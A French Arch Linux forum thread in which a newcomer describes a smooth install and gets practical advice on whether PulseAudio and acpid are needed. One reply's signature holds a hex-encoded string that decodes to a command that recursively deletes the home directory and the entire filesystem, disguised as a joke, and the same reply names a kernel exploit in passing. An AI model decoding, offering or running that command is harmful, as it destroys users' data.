[nouveau]mon installation s'est bien passée (résolu)

Questions et astuces concernant l'installation et la configuration d'archlinux
nimoinau
newbie

[nouveau]mon installation s'est bien passée (résolu)

Message par nimoinau »

bonjour,
je suis nouveau sur archlinux, j'utilise ubuntu depuis 1an 1/2.
depuis quelques mois, je me suis tourné vers openbox seul que j'aime vraiment, mais toujours sur une base ubuntu.
mais, j'avais envie d'avoir une installation minimum et ne mettre que ce que je voulais comme paquets.

Et j'ai découvert archlinux !

j'ai tout installé en suivant l'excellent wiki. j'avais un peu peur pour mon imprimante, mais finalement cups s'est bien installé. puis j'ai mis alsa et ensuite je suis passé du pilote ati radeon hd au pilote ati proprio sans faire planter mon xorg. bref, que du bonheur :lol:

résultat : je n'ai plus tous les daemons au démarrage que j'avais sur ubuntu et dont je ne connaissais pas l'importance. tout se lance bien, rapide.
j'ai compris davantage de choses sur le fonctionnement de mon système et des fichiers de configurations.
yaourt est très sympa (sauf les couleurs où je ne vois pas les numéros :? )

en bref, tout est nickel .

2 petites questions quand même : alsa fonctionne très bien, mais faut-il que j'installe pulseaudio ?
j'ai un pc fixe, est-il utile que j'installe acpid ?

voilà
Dernière modification par nimoinau le mer. 26 août 2009, 10:43, modifié 1 fois.
ddup1
Chu Ko Nu

Re: [nouveau]mon installation s'est bien passée (non résolu)

Message par ddup1 »

Alors concernant pulseaudio voilà ce qu'il faut se poser comme question :
- ai je besion de transporter le son via le réseau ?
- est ce que j'utilise plusieurs carte son en même temps et je veux switcher le son d'une carte à une autre sans interruption ?
- je désire controler le son par appli individuellement ?

Si c'est non à toutes ces questions pulseaudio demeurre inutile (d'autant plus qu'il y a quelques souci avec des appli proprio comme skype ou il faut bidouiller pour que ça marche)

Concernant acpid, si tu veux programmer l'extinction de ton PC en appuyant sur le bouton power il te le faut, sinon pas besoin. Je pense aussi qu'il doit être nécessaire si tu mets ton PC en veille. Je ne vois pas d'autre utilité à l'acpi sur un fixe.
Un clavier azerty en vaut deux :D
http://www.dupnet.org/dotclear/
nimoinau
newbie

Message par nimoinau »

merci,
donc je n'ai pas besoin des 2
r4is3_your_g0d
Hankyu

Message par r4is3_your_g0d »

ddup1 a écrit : Si c'est non à toutes ces questions pulseaudio demeurre inutile (d'autant plus qu'il y a quelques souci avec des appli proprio comme skype ou il faut bidouiller pour que ça marche)
Sans parler de l'exploit sur sock_send_page (m'enfin sous Arch...) :wink:
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON

Code : Tout sélectionner

x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26
Répondre